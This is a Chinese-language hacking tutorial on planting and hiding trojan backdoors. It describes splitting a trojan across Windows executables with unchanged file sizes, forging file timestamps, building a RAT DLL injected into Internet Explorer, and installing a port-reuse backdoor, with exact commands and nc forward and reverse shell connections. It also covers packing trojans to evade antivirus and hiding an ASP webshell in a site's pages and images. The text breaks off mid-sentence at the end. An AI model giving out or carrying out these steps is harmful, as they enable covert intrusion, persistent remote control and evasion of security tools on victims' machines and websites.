化整为零，另类后门捆绑

　　木马捆绑是一种常见的木马植入手段。这种方法虽然给木马提供了较好的伪装，但是宿主文件的大小在捆绑木马后会发生变化，尤其是一些体积较大的木马，会使捆绑后的文件体积发生明显变化，您只需稍微细心些就能识破。
　　不过，新的木马后门植入工具RobinPE却另辟蹊径，它将后门文件藏匿在任意的可执行程序文件中，而程序文件的大小基本不发生变化。
第一步：准备
　　假设要将某个木马植入explorer.exe文件中，这里使用一个叫作“Fuck Trojan”的木马，并将对服务端程序“Server.exe”加壳处理，以躲过杀毒软件的查杀，然后运行工具RobinPE。
第二步：计算空间，植入前的关键
　　使用RobinPE在正常程序中植入木马前，首先要计算程序文件可利用的空间，然后才能将后门木马植入缝隙而不额外增加代码区块，从而使文件大小不发生变化。
　　打开RobinPE后，点击界面右下角的“整体植入”按钮，然后在“后门文件”项中浏览选择刚才的木马服务端文件“Server.exe”，在“整体植入”中浏览选择备份的“explorer.exe”文件，如图1所示。

　　点击“计算空间”按钮，即可开始计算宿主文件“explorer.exe”中剩余的空间，对比木马文件“Server.exe”的大小，判断是否可以将文件植入宿主文件中。
　　可以查看到最后的计算结果，木马文件共有177664字节，而宿主文件中仅剩下了26531个字节空间，因　　此该木马显得太大，不能植入explorer.exe文件中。
第三步：化整为零，分体植入法
　　所谓“整体植入”，是将木马文件全部植入一个exe文件之中，而分体植入则是将一个文件拆解植入到多个文件里，从而保证木马文件有足够的存放空间。
　　（1）设置多个宿主文件
　　点击界面右下角的“分体植入”按钮，切换到分体植入界面中。在“分解植入”项中点击“添加”按钮，添加多个宿主文件到中间的列表框中。添加完毕后，点击“计算空间”即可计算所有宿主文件总的剩余空间，对比木马文件大小以判断是否能够植入。
　　可以选择添加8个宿主文件，要求所有宿主文件都位于同一目录中，并且在植入后不能将宿主文件随意改名。在这里选择了与explorer.exe位于同一目录下的“hh.exe”、“winhelp.exe”等几个文件。
　　（2）设置启动文件
　　在宿主文件列表框中，选择其中一个宿主文件“explorer.exe”，然后点击右边的“设为启动”，此宿主文件将被作为主启动文件。木马文件还原代码和数据表都将植入到这个文件中，以后只要运行宿主文件，该文件就会自动将分解在各宿主文件中的木马组合还原成完整的程序，并自动执行。
　　设置完毕后，点击“开始植入”按钮，即可开始将木马服务端程序Server.exe文件分解植入到explorer.exe等几个文件中了。
第四步：修改文件时间
　　由于植入木马后，启动文件和宿主文件的文件创建和修改日期会发生变化，因此我们需要将文件时间恢复原样。在RobinPE中自带了一个名为“时空机器”的工具，可以修改文件的时间和日期。
　　在文件框中浏览输入文件路径和文件名，然后在界面下方设置程序文件的创建时间和修改时间，最后点击“确认修改”即可，如图2所示。

　　这样将木马分体植入几个文件中，并且不改变被植入文件的大小，完全可以躲过杀毒软件的查杀。

DLL插入，技高一筹

　　DLL插入型的木马后门是将木马后门做成了DLL文件，然后由某一个exe作为载体，或者使用Rundll32.exe来启动。这使得该类型木马具有无进程、不开端口等特点，实现了进程、端口的隐藏，因此很难被发现，大大提高了木马的存活率。下面来看看这种木马是如何被打造的。
第一步：基本设置
　　Nuclear RAT 1.0 Beta 6是一款支持IP反弹的DLL木马，可以自定义插入进程，有DNS和读取网页位置两种反弹方式，也有命令群发功能，其功能很全面也很实用。
　　运行程序后，点击工具栏上的Create Server按钮，在弹出对话框中选择Connection标签，在这里可以输入连接服务端的IP地址，设置木马的连接选项等，如图3所示。木马采用两种反弹方式，包括DNS和读取网页位置的，可在URL和DNS项中输入相应的IP地址或域名。

第二步：DLL插入设置
　　最重要的设置项是DLL插入选项。切换到“Filenames”标签，在“Filename”项输入木马后门的程序文件名，在“DLL Name”处输入生成的DLL文件名，在“Folder name”中输入木马后门程序文件和DLL文件保存路径，使用默认设置即可。最后，在“Inject to”项中输入要注入的系统进程，一般选择为　　　　“iexplore.exe”，如此一来，只要中了木马的主机上网运行IE浏览器，就会自动连接客户端程序了，如图4所示。

　　在“Misc”标签和“Message Box”中，可以设置程序安装时的迷惑信息。在“PHP”中可以指定反弹的PHP网页，最后点击“Build”标签，即可生成服务端程序了。当某台主机上运行了生成的木马服务端后，木马程序会将DLL文件注入IE浏览器中，并随IE打开而启动，自动连接到客户端上。这时候，黑客就可以利用客户端上的强大功能对主机进行远程管理和控制了。

端口复用，难觅其踪

　　所谓端口复用技术,就是重复使用某个打开的端口来绑定我们的shell，一般这些端口都是防火墙允许的端口，不会被查杀。PortLess BackDoor就是一个非常优秀的端口复用后门木马，在安装后使用svchost.exe去启动，平时不开端口。在启动后使用端口复用技术，可以进行反连接。
第一步：安装
　　首先将木马压缩包中的portlessinst.exe和svchostdll.dll(不要改名)上传到远程主机的系统目录(%winnt%system32目录中)，然后进行安装。
　　　Portlessinst的安装格式为：
　　　Portlessinst.exe -install  <特征字符串>  <连接密码>
　　小提示：“特征字符串”表示安装后显示的服务名称，密码是用来连接服务端程序的。
例如，在远程窗口中运行如下命令：
Portlessinst.exe -install xiaoyao puma
安装完成后还要启动木马程序服务。该后门安装为iprip，那么一般安装后使用“net start iprip”命令启动。
第二步：连接
假设我们已将portlessinst.exe和svchostdll.dll上传到一台IP是192.168.1.11的系统中，这系统的135端口有打开。安装服务端木马后门程序成功后，启动iprip服务。
如果要进行正向连接，首先输入“nc 192.168.1.11 135”，连上后输入“xiaoyao：1345”，然后退出登录。
再次输入“nc 192.168.1.11 1345”，看到“Enter Password:”的Banner后，输入密码puma，就可以登录了。
若是进行反向连接，假设您的IP地址是202.177.62.20，首先在自己的系统中运行“nc -l -p 12345”（监听本地12345端口），然后执行“nc -vv 192.168.1.11 80”命令。连上主机后,输入“xiaoyao|202.177.62.20:12345”命令，此时，在本地的NC监听窗口中就可以看到自己登录上远程主机了。

为木马加上外壳

　　杀毒软件是靠特征码来识别木马的，所以黑客们还可能通过加壳工具更改木马的特征码躲过杀毒软件的查杀！
　　首先准备一款功能强大的木马客户端程序，然后运行加密程序ASPack。点击界面中的“打开”按钮，选择一个要压缩的木马客户端程序，确定后，ASPack会自动对程序进行备份，并压缩生成一个新的木马客户端程序。
　　加壳完成后，木马客户端程序已经与过去不一样了，一般的杀毒软件很难查出。

ASP木马后门的隐藏技巧

　　使用80端口的网页木马比较特殊，不便进行加壳等操作，可以用图片包含的形式隐藏在正常网页中。
　　1.将木马插入网页源代码中
　　首先假设我们已经通过某种方法入侵到某个网站，上传某ASP木马后门。在Webshell中浏览服务器文件夹，在其中任意找一个后缀为“.asp”的网页文件，点击文件旁的“Edit”按钮，将ASP网页打开编辑文件，并将代码“ ”粘贴到文件尾部。
　　保存文件后，将修改过的ASP文件上传，可以发现刚才的网页文件已经变成一个ASP木马后门了。
　　2.变图片为后门
　　其实我们还可以直接将后门留在图片中，再通过网页调用的形式连接隐藏在图片中的木马后门。
首先通过Webshell从网站服务器上下载任一图片，然后在命令提示符窗口中输入如下命令：
　　　copy /b test.gif+asp. asp test.gif
　　执行后即可将ASP木马与图片进行合并，将名为“asp.asp”的冰狐浪子ASP木马嵌入到图片中了。然后将新生成的图片文件上传到服务器上，覆盖文件夹中原来的图片文件。
　　现在我们可以修改服务器上的任意ASP文件，在其中加入一行代码以调用该图片，代码语句如下：
　　　“